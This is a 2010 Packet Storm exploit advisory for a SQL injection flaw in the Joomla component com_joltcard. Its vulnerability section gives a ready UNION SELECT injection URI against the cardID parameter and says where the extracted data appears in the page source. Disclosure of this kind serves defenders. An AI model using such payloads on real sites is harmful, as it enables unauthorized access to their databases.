Joomla Joltcard SQL Injection

2010-04-17T00:00:00
ID PACKETSTORM:88524
Type packetstorm
Reporter Valentin Hoebel
Modified 2010-04-17T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability  
# Date: 17.04.2010  
# Author: Valentin  
# Category: webapps/0day  
# Version: unknown  
# Tested on:   
# CVE :   
# Code :   
  
  
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]  
|:: >> General Information   
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability  
|:: Author = Valentin Hoebel  
|:: Contact = valentin@xenuser.org  
|::   
|::   
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]  
|:: >> Product information  
|:: Name = com_joltcard  
|:: Vendor = JOLT media  
|:: Vendor Website = http://jolt.ca/  
|:: Affected Version(s) = unknown  
|::   
|::   
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]  
|:: >> #1 Vulnerability  
|:: Type = SQL Injection  
|:: Vulnerable Parameter(s) = cardID  
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--  
|:: Selected information gets only displayed within the HTML source code (look at <OBJECT> tag).   
|::  
|::   
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]  
|:: >> Additional Information  
|:: Advisory/Exploit Published = 17.04.2010  
|::   
|::   
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]  
|:: >> Misc  
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!  
|::  
|::   
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]  
  
`